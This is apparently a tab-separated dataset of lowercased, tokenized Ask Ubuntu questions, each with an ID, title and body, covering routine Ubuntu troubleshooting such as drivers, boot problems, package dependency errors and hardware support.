472517	how to get `` delete playlist '' confirmation popup back in banshee ?	at some point while deleting playlists in banshee and seeing the confirmation popup that asks if i 'm sure i want to delete , i checked the `` do n't ask this question again '' box . how do i undo this and make the confirmation popup show up again when deleting playlists ? update : i found the .config/banshee-1/banshee.db configuration file and looked around with sqlitebrowser to see if i could find that setting , but i did n't see anything that looked like the setting i want ( it 's entirely possible that i missed something though ) . ( xubuntu 14.04 , banshee 2.6.2 )
472518	trusty software center : remove package listing under `` installed '' dropdown menu	i removed a couple of software and packages . in the ubuntu software center under the `` installed '' drop down menu , the packages are still there . they have no function as when i click on it , it leads to nowhere . i was wondering if there a way to remove it from the list .
472519	how to install kivy for python and its dependencies to build android apps ?	i have ubuntu 12.04 , i read the documentations and it confuses me , i just want to know what to type in the terminal or what and how to download whatever i need . please help .
472521	restricted user account creation	i was once given a shell account ( for irc ) that allowed me read/write access to my home folder only . the first time i logged in , it forced me to change my password too . say i wanted to create a new user with this type of structure . any guides i can look into ?
472522	how to get all ubuntu programms back to fullscreen size after i 'm not sure what i did ?	i somehow managed to loose the ability of all my programs to resize on ubuntu . not sure what i did , but i thought i saw a popup open and being blocked in firefox and after that all my programms opening like this screenshot : i can neither double click to expand nor close a program via the top bar because it 's not there anymore . question : being a ubuntu beginner , what happened and more importantly , how do i switch back to normal programm size ? thanks !
472524	dual boot : ubuntu installation not detecting existing windows operating system	in my attempt to set up a dual boot system , by installing ubuntu 14.04 onto my system with windows 7 , i have encountered a pretty stubborn problem . i have loaded ubuntu into a bootable usb device . when installing ubuntu , whether through `` try ubuntu w/o installing '' or the other `` install ubuntu '' option , ubuntu never presents the `` install alongside windows option '' . the only two options that i have are the 1. erase all data and install ubuntu on drive and 2. do other stuff ( display partitions ) looking at posts by folks who have encountered this issue in the past , i have attempted some of the various suggested solutions.. without avail . fixparts remove dmraid i have a boot repair log up : http : //paste.ubuntu.com/7522909/ any help would be greatly appreciated !
472526	vokoscreen buttons panel does n't work in ubuntu 14.04	hello i installed vokoscreen in ubuntu 14.04 via repositories and it works correctly , except for a small issue if i try to start , pause or stop vokoscreen via the panel buttons does n't works for me . i have to do it via the keyboard : start : ctrl + shift + f10 stop : ctrl + shift + f11 pause : ctrl + shift + f12 how i can fix this .. ? best regards
472529	ubuntu 14.04 can not open nvidia settings/switch between gpus , hybrid graphics	i have a lenovo thinkpad edge e531 laptop that dual boots windows 7 and ubuntu 14.04 . prior to upgrading to 14.04 i was using bumblebee in order to utilize my nvidia gpu ( nvidia geforce 740m ) . in 14.04 i read somewhere that it was better to use prime and switch easily between the two graphic cards at any time . so i tried installing nvidia 331 , 337 and all other versions between 331 and 337 that automatically came with prime installed , but i encountered the following problem : once the nvidia driver is installed , the laptop starts using the nvidia card exclusively and when i switch back to my intel card i can no longer open nvidia settings and i can no longer switch back to my nvidia card . this is what i get when i try to launch nvidia settings from the terminal : ** message : prime : requires offloading ** message : prime : is it supported ? yes segmentation fault ( core dumped ) i tried everything ( installed prime indicator , tried with different version of nvidia driver ) , but to no avail . any help will be greatly appreciated ! thank you .
472531	ubuntu 14.04 intel brightness after resume	i recently installed ubuntu 14.04 on my dell inspiron laptop . seeing that my hotkeys did n't work , i followed the instructions here and everything was going smooth . except for when i close the lid to my laptop . when i do that , it goes into suspend and when i reopen it , the screen has zero backlight making it virtually impossible to see . is there any way to fix the resume-issue ? sure , i could just use the newly-fixed hotkeys , but it 's kind of annoying to do every time ... thanks for any advice you could give me .
472532	deleted xubuntu partition , windows will now not boot	i deleted the xubuntu partition , hoping it would just delete xubuntu and everything would be fine . but now it still boots to grub , and will not boot to windows . i have no idea how boot to windows , it 's not under any of the boot options or devices .
472533	ubuntu server 14.04 no longer boots	my ubuntu 14.04 server suddenly stopped booting . the logs do n't really indicate what 's going on . i took an image of the boot disk and ran it in qemu-kvm . it behaves exactly as on the physical machine . i attached the screenshots of tty 1 and tty 7 . the boot process basically goes like this : it runs through the first few lines , then gets to the /dev/random pool and then waits one minute , afterwards there are the messages in tty 1 , then , after another 5-10 minutes the screenshot on the bottom was taken with the mounting problems ( /mnt/storage is really not there , because it is the kvm machine , but all the others should be working ) . i already tried to get error messages from logs ( did n't work , as there are none ) , tried strace on qemu , updated initramfs and booted older kernels . i also scrub 'd , balanced and fsck 'd the root file system . i also tried to boot older snapshots , but it did n't help . the system is on btrfs ( no raid ) and boots with a separate efi partion on the same ssd . does anybody know what could cause this ?
472535	cinnamon installation error in ubuntu 12.04	i used these commands in ubuntu 12.04 for install cinnamon theme . sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon but the terminal says , enter code herereading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : cjs but it is not going to be installed depends : libcjs0-libmozjs185-1.0 depends : libcjs0c ( > = 2.0.0-20131105020703 ) but it is not going to be installed depends : libmozjs185-1.0 ( > = 1.8.5-1.0.0 ) but it is not installable depends : caribou but it is not installable depends : python-opencv but it is not installable depends : mesa-utils but it is not installable recommends : gnome-themes-standard but it is not going to be installed recommends : nemo but it is not going to be installed recommends : cinnamon-screensaver but it is not going to be installed recommends : gir1.2-cjsdbus-1.0 but it is not installable recommends : cinnamon-bluetooth but it is not installable e : unable to correct problems , you have held broken packages . how to correct this ?
472536	hp mini 210 too hot on lubuntu 14.04	i have looked around the internet and have not found a solution to my overheating problem and thought i would ask you . i 'm relatively new to linux , but have converted my hp mini 210 into a lubuntu 14.04 machine . and things are running nicely here , except that the computer is running significantly warmer than when i ran windows 7 . i ca n't remember what processor / graphics card i have , and am not sure how to check this on lubuntu ( any help here ? ) but a standard hp mini 210 has a 1.666hz intel atom processor n450 and an intel gma 3150 graphics card . any ideas of how i can make my computer less hot ?
472538	can i make a package .deb from .tar.gz or .tar.bz2 ?	if i had an application with .tar.gz or .tar.bz2 extension can i transform it to a package .deb ?
472540	is there a pdf reader allowing me to change background color of ( arxiv ) pdfs ?	its quite common that one wishes or has to read lots of pdf files which are intended to be printed , but since one would read them only once , and one wishes to save some trees , one reads them on acrobat reader , evince , xpdf or whatever your choice . it would be an advantage to be able to control the background 's color . instead of black text on white background , i 'd like to have a gray background . by googling i just get the inversion of colors as suggestion â which is sometimes even worse for the eyes . is there a pdf reader allowing me to change background color ( without changing the color of the text ) ? edit : the first comment below suggests it depends on the file . therefore i added to the title arxiv 's .
472542	external hard drive erased and possibly corrupted after partition change on gparted	i have a wd elements external hard drive and i used it on my windows to install ubuntu 14.04 . i then used gparted to bring back windows and run a dual-boot , so i changed the external hard drive 's format from fat32 to ntfs . it did not result in any loss whatsoever . the next day , however , i plugged the same hard drive into my laptop and instead of saying `` wd elements '' when i open it , the drive said `` 160 gb volume '' and it was completely empty . how , exactly , am i supposed to bring back the files on it ? if i can not do it manually , will a data engineer be able to do the same ? any help would be appreciated .
472543	how to discover what file in the dev/ directory is related to the sd card reader of my laptop ?	how can i discover what file inside dev/ directory is related to my sd card reader of my laptop ? i thought that i could execute the following operations : 1 ) remove the sd card from the reader 2 ) insert it again into the reader 3 ) open the dmesg log and search in the lasts records but this is not possible for me because my ubuntu is installed on a virtual machine and when i remove and put it again the sd card the system crash what can i do to discover it ? edit 1 : executing sudo fdisk -l i obtain this output disco /dev/sdb : 7948 mb , 7948206080 byte 255 testine , 63 settori/tracce , 966 cilindri , totale 15523840 settori unită = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0x00000000 dispositivo boot start end blocks id system /dev/sdb1 8192 15518789 7755299 b w95 fat32 disk /dev/sda : 42.9 gb , 42949672960 bytes 255 testine , 63 settori/tracce , 5221 cilindri , totale 83886080 settori unită = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0x000ba73e dispositivo boot start end blocks id system /dev/sda1 * 2048 77080575 38539264 83 linux /dev/sda2 77082622 83884031 3400705 5 esteso /dev/sda5 77082624 83884031 3400704 82 linux swap / solaris andrea @ andrea-virtual-machine : ~ $ tnx andrea
472545	how do i load ubuntu using netboot ?	i 've been reading through the different options and through the wiki but was wondering which option would be the best for me ? i have a tower that was running windows xp from a friend , and want to load ubuntu onto it . the boot options are network boot , floppy , cd-rom , hard drive . no usb option . phoenix - awardbios core version v6.0 , bios revision 3.11 5/17/2004 256 mb pc2700 i have my desktop running ubuntu , but need to know how to get ubuntu onto that tower . which is my best option , and what do i download to get it set up properly ? any advice towards a netboot would be amazing . thank you in advance .
472546	ca n't get index.html to open after lamp install on ubuntu 14 on amazon aws server	i ca n't believe i am struggling with this . i 've set up ites on centos but apache on ubunto is so different . running ubuntu 14 on aws . i want to setup joomla but i ca n't even get the default index.html that is included with apache2 to open ! i am only going to have one website on this server . i installed all lamp components via sudo apt-get install lamp-server^ . can someone tell me what if anything i need to do with apache2.conf , the file in sites-available and or the config file in sites-enabled ? i would have though that after the initial install of lamp if i just entered the public address of my ec2 instance/index.html the default page would come up , but instead i get nothing . any help would be appreciated . i need to at least get the default index.html loading before i bother installing joomla . i assume its something really simple that i am missing here . thanks
472556	installing the latest docker version on ubuntu 14.04	when i follow the official instructions for ubuntu 14.04 , i end up with docker 0.9.1 . when i do it for ubuntu 12.04 it correctly installs the latest version : 0.11 . how can i install 0.11 on ubuntu 14.04 ?
472558	convert movie with arista makes gstreamer gstreamer error	i want to merge movie and subtitles into one video file . when i 'm trying to do that i 'm getting error . i guess the problem is because i 'm using 64 bit version of ubuntu . terminal output : wojciechko @ ubuntu ~ > sudo arista-gtk & wojciechko @ ubuntu ~ > arista.presets [ 435 ] : info attempting to install elements : faac , ffdeinterlace error : org.freedesktop.packagekit.modify.failed : package dependencies can not be resolved - this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : gstreamer0.10-plugins-bad : i386 : depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6 is to be installed depends : libcairo2 ( > = 1.2.4 ) but 1.13.0~20140204-0ubuntu1 is to be installed depends : libcdaudio1 ( > = 0.99.12p2 ) but 0.99.12p2-13 is to be installed depends : libcurl3-gnutls ( > = 7.16.2 ) but 7.35.0-1ubuntu2 is to be installed depends : libdvdnav4 ( > = 4.1.3 ) but 4.2.1-3 is to be installed depends : libdvdread4 ( > = 4.1.3 ) but 4.2.1-2ubuntu1 is to be installed depends : libfaad2 ( > = 2.7 ) but 2.7-8 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed depends : libgsm1 ( > = 1.0.13 ) but 1.0.13-4 is to be installed depends : libgstreamer-plugins-bad0.10-0 ( = 0.10.23-7.2ubuntu1 ) but 0.10.23-7.2ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.36 ) but 0.10.36-1.1ubuntu2 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.36 ) but 0.10.36-1.2ubuntu3 is to be installed depends : libmpcdec6 ( > = 1:0.1~r435 ) but 2:0.1~r459-1ubuntu3 is to be installed depends : libopenal1 ( > = 1:1.13 ) but 1:1.14-4ubuntu1 is to be installed depends : libopus0 ( > = 1.0.3 ) but 1.1-0ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.18 ) but 1:0.4.18-1ubuntu1 is to be installed depends : libpng12-0 ( > = 1.2.13-4 ) but 1.2.50-1ubuntu2 is to be installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.40.2-1 is to be installed depends : librtmp0 ( > = 2.3 ) but 2.4+20121230.gitdf6c518-1 is to be installed depends : libschroedinger-1.0-0 ( > = 1.0.9 ) but 1.0.11-2ubuntu1 is to be installed depends : libsndfile1 ( > = 1.0.20 ) but 1.0.25-7ubuntu2 is to be installed depends : libsoundtouch0 ( > = 1.7.1-3~ ) but 1.7.1-5 is to be installed depends : libssl1.0.0 ( > = 1.0.0 ) but 1.0.1f-1ubuntu2.1 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.8.2-19ubuntu1 is to be installed depends : libvpx1 ( > = 1.0.0 ) but 1.3.0-2 is to be installed depends : libxvidcore4 ( > = 1.2.2 ) but 2:1.3.2-9ubuntu1 is to be installed traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/sessioninstaller/gstinstaller.py '' , line 97 , in main installer.run ( ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/errors.py '' , line 71 , in _convert_dbus_exception raise get_native_exception ( error ) modifyfailed : org.freedesktop.packagekit.modify.failed : package dependencies can not be resolved - this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : gstreamer0.10-plugins-bad : i386 : depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6 is to be installed depends : libcairo2 ( > = 1.2.4 ) but 1.13.0~20140204-0ubuntu1 is to be installed depends : libcdaudio1 ( > = 0.99.12p2 ) but 0.99.12p2-13 is to be installed depends : libcurl3-gnutls ( > = 7.16.2 ) but 7.35.0-1ubuntu2 is to be installed depends : libdvdnav4 ( > = 4.1.3 ) but 4.2.1-3 is to be installed depends : libdvdread4 ( > = 4.1.3 ) but 4.2.1-2ubuntu1 is to be installed depends : libfaad2 ( > = 2.7 ) but 2.7-8 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed depends : libgsm1 ( > = 1.0.13 ) but 1.0.13-4 is to be installed depends : libgstreamer-plugins-bad0.10-0 ( = 0.10.23-7.2ubuntu1 ) but 0.10.23-7.2ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.36 ) but 0.10.36-1.1ubuntu2 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.36 ) but 0.10.36-1.2ubuntu3 is to be installed depends : libmpcdec6 ( > = 1:0.1~r435 ) but 2:0.1~r459-1ubuntu3 is to be installed depends : libopenal1 ( > = 1:1.13 ) but 1:1.14-4ubuntu1 is to be installed depends : libopus0 ( > = 1.0.3 ) but 1.1-0ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.18 ) but 1:0.4.18-1ubuntu1 is to be installed depends : libpng12-0 ( > = 1.2.13-4 ) but 1.2.50-1ubuntu2 is to be installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.40.2-1 is to be installed depends : librtmp0 ( > = 2.3 ) but 2.4+20121230.gitdf6c518-1 is to be installed depends : libschroedinger-1.0-0 ( > = 1.0.9 ) but 1.0.11-2ubuntu1 is to be installed depends : libsndfile1 ( > = 1.0.20 ) but 1.0.25-7ubuntu2 is to be installed depends : libsoundtouch0 ( > = 1.7.1-3~ ) but 1.7.1-5 is to be installed depends : libssl1.0.0 ( > = 1.0.0 ) but 1.0.1f-1ubuntu2.1 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.8.2-19ubuntu1 is to be installed depends : libvpx1 ( > = 1.0.0 ) but 1.3.0-2 is to be installed depends : libxvidcore4 ( > = 1.2.2 ) but 2:1.3.2-9ubuntu1 is to be installed arista.presets [ 444 ] : error unable to install required elements ! manual installation : wojciechko @ ubuntu ~ > sudo apt-get install gstreamer0.10-plugins-bad : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gstreamer0.10-plugins-bad : i386 : depends : libopus0 : i386 ( > = 1.0.3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . sources.list : wojciechko @ ubuntu /e/a/sources.list.d > cat /etc/apt/sources.list # deb cdrom : [ ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ] / trusty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //pl.archive.ubuntu.com/ubuntu/ trusty main restricted deb-src http : //pl.archive.ubuntu.com/ubuntu/ trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //pl.archive.ubuntu.com/ubuntu/ trusty-updates main restricted deb-src http : //pl.archive.ubuntu.com/ubuntu/ trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //pl.archive.ubuntu.com/ubuntu/ trusty universe deb-src http : //pl.archive.ubuntu.com/ubuntu/ trusty universe deb http : //pl.archive.ubuntu.com/ubuntu/ trusty-updates universe deb-src http : //pl.archive.ubuntu.com/ubuntu/ trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //pl.archive.ubuntu.com/ubuntu/ trusty multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ trusty multiverse deb http : //pl.archive.ubuntu.com/ubuntu/ trusty-updates multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //pl.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //security.ubuntu.com/ubuntu trusty-security main restricted deb http : //security.ubuntu.com/ubuntu trusty-security universe deb-src http : //security.ubuntu.com/ubuntu trusty-security universe deb http : //security.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //security.ubuntu.com/ubuntu trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu trusty partner # deb-src http : //archive.canonical.com/ubuntu trusty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main sources.list.d/* wojciechko @ ubuntu /e/a/sources.list.d > cat /etc/apt/sources.list.d/* deb http : //ppa.launchpad.net/alexmurray/indicator-sensors-daily/ubuntu trusty main # deb-src http : //ppa.launchpad.net/alexmurray/indicator-sensors-daily/ubuntu trusty main deb http : //ppa.launchpad.net/alexmurray/indicator-sensors-daily/ubuntu trusty main # deb-src http : //ppa.launchpad.net/alexmurray/indicator-sensors-daily/ubuntu trusty main deb http : //linux.dropbox.com/ubuntu trusty main deb http : //linux.dropbox.com/ubuntu trusty main deb http : //ppa.launchpad.net/fish-shell/release-2/ubuntu trusty main # deb-src http : //ppa.launchpad.net/fish-shell/release-2/ubuntu trusty main deb http : //ppa.launchpad.net/fish-shell/release-2/ubuntu trusty main # deb-src http : //ppa.launchpad.net/fish-shell/release-2/ubuntu trusty main deb http : //ppa.launchpad.net/jfi/psensor-daily-trunk/ubuntu trusty main # deb-src http : //ppa.launchpad.net/jfi/psensor-daily-trunk/ubuntu trusty main deb http : //ppa.launchpad.net/jfi/psensor-daily-trunk/ubuntu trusty main # deb-src http : //ppa.launchpad.net/jfi/psensor-daily-trunk/ubuntu trusty main # this file makes sure that opera browser is kept up-to-date # as part of regular system upgrades deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) # the line above will make sure you get all final public releases . # uncomment the following line if you want to get alpha and beta # releases , too . # deb http : //deb.opera.com/opera-beta/ stable non-free # opera browser ( beta releases ) # this file makes sure that opera browser is kept up-to-date # as part of regular system upgrades deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) # the line above will make sure you get all final public releases . # uncomment the following line if you want to get alpha and beta # releases , too . # deb http : //deb.opera.com/opera-beta/ stable non-free # opera browser ( beta releases ) deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu trusty main # deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu trusty main
472559	is it possible to change the click behavior on the launchers ? left click on a launcher opens the right click menu	my launcher consists of a few icons , with about 5 applications in the right click menu of each icon . if possible , i 'd like to change the behavior of clicking on these icons . instead of right clicking to get the menu , i 'd like to left click , and get the menu that you normally get by right clicking the icon .
472561	ca n't log in to steam ubuntu 14.04 lts	when you start steam message `` steam is having trouble connecting to the steam servers . '' jakub @ pc : ~ $ steam running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number [ 0526/004126 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) [ http remote control ] http server listening on port 34547 . installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) generating new string page texture 7 : 128x256 , total string texture memory is 131,07 kb generating new string page texture 8 : 64x256 , total string texture memory is 196,61 kb generating new string page texture 9 : 48x256 , total string texture memory is 245,76 kb generating new string page texture 10 : 256x256 , total string texture memory is 507,90 kb generating new string page texture 11 : 16x256 , total string texture memory is 524,29 kb generating new string page texture 12 : 24x256 , total string texture memory is 548,86 kb generating new string page texture 13 : 32x256 , total string texture memory is 581,63 kb installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) how to fix it ?
472562	how to change `` keyboard input method system '' to `` none '' in ubuntu gnome ?	every time i install the default version of ubuntu 14.04 ( with unity ) , i go to `` language support '' and change the option `` keyboard input method system '' to `` none '' , because i need it that way . today , i installed ubuntu gnome 14.04 and i ca n't find this `` keyboard input method system '' option anywhere . please , how do i change this when using gnome shell ? thanks for your attention .
472565	any feature in ubuntu by which we can lossless compress images in bulk	i am looking for a way in which i can do a lossless compression of all images in a directory in a batch process . i do n't want images to loose quality . i am running this website winni.in , for this if you check in google 's pagespeed tool , it suggests you to optimize images using lossless compression . for new product 's images i can make changes in my algorithm of image saving but for existing images of products i need a way by which i can run a command which can do lossless compression for all images of products residing in a directory . edit : please see this site report http : //gtmetrix.com/reports/www.winni.in/pzjbf0rw here you can find optimize images point in 5th suggestion , there you can see it is listing number of jpeg images to losslessly compress . if you optimize your images from an online image optimization utility like kraken.io then this warning is gone .
472566	14.04 wo n't save wpa password	recently installed ubuntu 14.04 desktop 64 bit . most things works great except it wo n't save my password for my wireless network , which is security : wpa & wpa2 enterprise authentication : protected eap ( peap ) inner authentication : mschapv2 my user name and password are saved in the network manager , but every time i boot into ubuntu , it asks for my wireless password and a certificate . i 've told it to save my password and ignore the certificate n+ times , but no success .
472567	dear esther on ubuntu 14.04	i want to play the acclaimed indie game dear esther . if possible i 'd like to avoid the fuss of running it under wine.there is a native build available here , but the only available versions are on 12.10 and 13.04 . does anybody have any information on whether this will run in 14.04 ? thanks .
472570	brother hl-1110e printer driver	could you please help me with instalation of printer brother hl-1110e for kubuntu 14.04 ? i have n't found any official driver . someone did package for archlinux , i converted them with alien to .dep , but nothing happened . thank you . https : //bbs.archlinux.org/viewtopic.php ? id=177290
472577	none of the ubuntu installing in my pc	i have tried all windows versions from xp to win8.1 .all works fine . but when i tried installing ubuntu from 10.10 to 14.04 i am getting hardware exception like kernal panic , not in sync , like that . what can i do ? i even tried xubuntu , lubuntu , zorin , fedora , pear ect.. , all fails . only fedora runs but i am unable to play any audios or videos even connected to network . all other fails even at the live cd booting itself.what can be done to make kernal in sync ? > i am also getting machine check fatal exception , tsc 0 processor 0:6f2 time 1400026888 socket 0 apic 0 microcode 51 , run above through 'mcelog -- ascii ' , trying to reboot.. hardware of my pc 1 gb ram 320 gb hard disk intel pentium processor
472579	i 've broken lightdm	i 've installed xubuntu-desktop metapackapge on my system and afted this action unity-greeter has gone away . ive purged lightdm twisely , then installed lightdm and unity-greeter . but still no result . copying all files from /usr/share/lightdm/lightdm.conf.d/ to /etc/lightdm/lightdm.conf.d/ returned my unite greeter . but it is uncontroolable . for example is asks my password each time after locking the screen . i 've rechecked this iptions is system settings many times , but i ca n't tune my lightdm . how to get my lightdm and unity greeter back withiut reinstalling of the system ?
472581	net activity - what does this network activity mean	tcp 53 domain listen * * . tcp 631 ipp listen * * . tcp6 53564 established : :1 631 ipp ip6-localhost tcp6 631 ipp established : :1 53564 ip6-localhost udp 47568 * * . udp 53 domain * * . udp 68 bootpc * * . udp 631 ipp * * . udp 46007 * * . udp 5353 mdns * * . udp6 60160 * * . udp6 44496 * * . udp6 5353 mdns * * . can anyone explain what this is ? i 'm i remotely being hacked through localhost ?
472582	recovering ubuntu one files before end of service	i am somewhat panicked about recovering my ubuntu one files , i tried to sync using the desktop application but it has n't been working since the announcement . now though , i ca n't even download files online ( which is a ridiculous pain anyway since i ca n't download entire folders ) . i need to get those files back before the service ends , but it seems there is no way to do so . who can i get in touch with about this ?
472584	avoid background updates if on mobile network	i 'd like to have updates fetched on a regular basis : apt , git remotes , r packages , stuff like that . i know how to set up crontab rules or how to change the apt settings . my only concern is that when i 'm on a network that charges by traffic ( e.g. , on a traffic-restricted mobile plan ) , i 'd like to turn this feature off . of course i 'm not going to change all crontabs , there must be something better . currently , my best idea is to have all scripts check the existence or contents of a certain file that could be altered manually or by some `` connect '' event . is there a standard approach to this , say , a switch on the gui that sets some system setting that can be queried , or a tag on a network that would label it as `` traffic-limited '' , or an ufw setting , or ...
472585	xbindkeys mx revolution and touchpad	i need some help in the configuration of my logitech mx revolution mouse on my ubuntu laptop . i followed this guide http : //x4dev.wordpress.com/2011/03/26/howto-logitech-mx-revolution-on-ubuntu/ to map keyboard-events to specific buttons ... .the problem is that i also have a touchpad and i do n't want it to behave like the mouse ... . how can i do ? thank you very much
472587	ca n't open usb stick	when i put my usb in my laptop i get the following error , on the usb is some data what i must have is there a way to get this ?
472589	why is my eyetoy usb camera not working on skype ?	i 've tried various threads and nothing seems to work properly . for some reason it works on cheese but not skype , so i have no idea what 's going on there .
472591	getting microsoft xbox 360 wireless networking adapter to work	my ethernet card just broke and i need a quick replacement . i thought of using my microsoft xbox 360 wireless networking adapter plugged as usb into my computer . however when i plugged it , dmesg only show : [ 2942134.259475 ] usb 2-1.3 : usb disconnect , device number 8 [ 2942134.459084 ] usb 2-1.3 : new high-speed usb device number 9 using ehci_hcd [ 2942134.555285 ] usb 2-1.3 : new usb device found , idvendor=045e , idproduct=0292 [ 2942134.555290 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=4 [ 2942134.555293 ] usb 2-1.3 : product : wireless networking adapter [ 2942134.555296 ] usb 2-1.3 : manufacturer : microsoft [ 2942134.555298 ] usb 2-1.3 : serialnumber : 08260063687827 [ 2949346.443394 ] usb 2-1.3 : usb disconnect , device number 9 it looks as if it can not be loaded as wifi card . does anyone knows if this card is supported on linux ? $ lsusb -d 045e:0292 bus 002 device 010 : id 045e:0292 microsoft corp. xbox360 wireless networking adapter
472593	how to disable thumbnail preview for text file	i am using ubuntu 14.04 but i miss one great feature of enabling and disabling preview for text file , so is their any way to do so ?
472595	how to install linux on mac mini 2010	i have a mac mini mid-2010 model i wiped out os x and installed ubuntu 14.04 64 bit mac . except , it 's really buggy . it freezes a lot and i have to restart . but someones it will work really smoothly for a few minutes . is it the os or is it my computer ? if its the os , what distro of linux should i get for my computer then ?
472597	ubuntu sd card reader problem	i have realtek sd card reader on ubuntu , and something weird happens : sometimes it recognises sd card , sometimes it has no action at all after putting it inside , and sometimes shows , disappears then shows and then disappears and so on , here 's dmesg when it happens : [ 705.838650 ] usb 1-1.2 : new high-speed usb device number 4 using ehci_hcd [ 706.414218 ] usb 1-1.2 : device not accepting address 4 , error -71 [ 706.430772 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 707.633972 ] usb 1-1.2 : new high-speed usb device number 6 using ehci_hcd [ 707.662063 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 707.831366 ] ieee80211 phy0 : start : tid 1 is not agg'able [ 707.889873 ] usb 1-1.2 : new high-speed usb device number 7 using ehci_hcd [ 707.918216 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 708.209589 ] usb 1-1.2 : new high-speed usb device number 8 using ehci_hcd [ 708.400918 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 708.400923 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 708.400927 ] usb 1-1.2 : product : usb2.0-crw [ 708.400930 ] usb 1-1.2 : manufacturer : generic [ 708.400934 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 708.465062 ] initializing usb mass storage driver ... [ 708.465154 ] usbcore : registered new interface driver usb-storage [ 708.465156 ] usb mass storage support registered . [ 708.477041 ] scsi4 : usb-storage 